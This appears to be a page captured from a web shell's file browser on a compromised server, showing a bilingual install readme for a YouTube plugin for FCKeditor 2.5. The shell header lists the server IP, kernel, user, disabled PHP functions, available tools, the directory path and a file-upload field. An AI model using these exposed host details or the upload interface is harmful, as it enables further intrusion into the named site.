| Server IP : 210.245.233.93 / Your IP : 216.73.216.226 Web Server : Apache/2.2.15 (CentOS) System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64 User : apache ( 48) PHP Version : 5.3.3 Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/airchats.com.hk/webadmin/fckeditor/editor/plugins/youtube/ |
Upload File : |
============================================================= = = YouTube Plugin For FCKeditor 2.5 = = http://uprush.net/ = http://www.sukekun.com/ ============================================================= Thank you for using YouTube Plugin For FCKeditor. Install 1.Copy the extraced 'youtube' folder to fckeditor/editor/plugins 2.Add it to the end of fckeditor/fckconfig.js FCKConfig.Plugins.Add( 'youtube', 'en,ja' ) ; 3.Modify fckeditor/fckconfig.js Add YouTube button to the toolbar of fckeditor. eg. BEFORE: FCKConfig.ToolbarSets["Default"] = [ ['Image','Flash'] ] AFTER: FCKConfig.ToolbarSets["Default"] = [ ['Image','Flash','YouTube'] ] YouTube Plugin For FCKeditor をご利用いただき、有難うございます。 インストール手順 1.解凍された youtube フォルダを fckeditor/editor/plugins/ にコピーする 2.fckeditor/fckconfig.js の最後に追加する FCKConfig.Plugins.Add( 'youtube', 'en,ja' ) ; 3.fckeditor/fckconfig.js を修正する ツールバー設定のところに、YouTube ボタンを追加する。 例)修正前 FCKConfig.ToolbarSets["Default"] = [ ['Image','Flash'] ] 修正後 FCKConfig.ToolbarSets["Default"] = [ ['Image','Flash','YouTube'] ]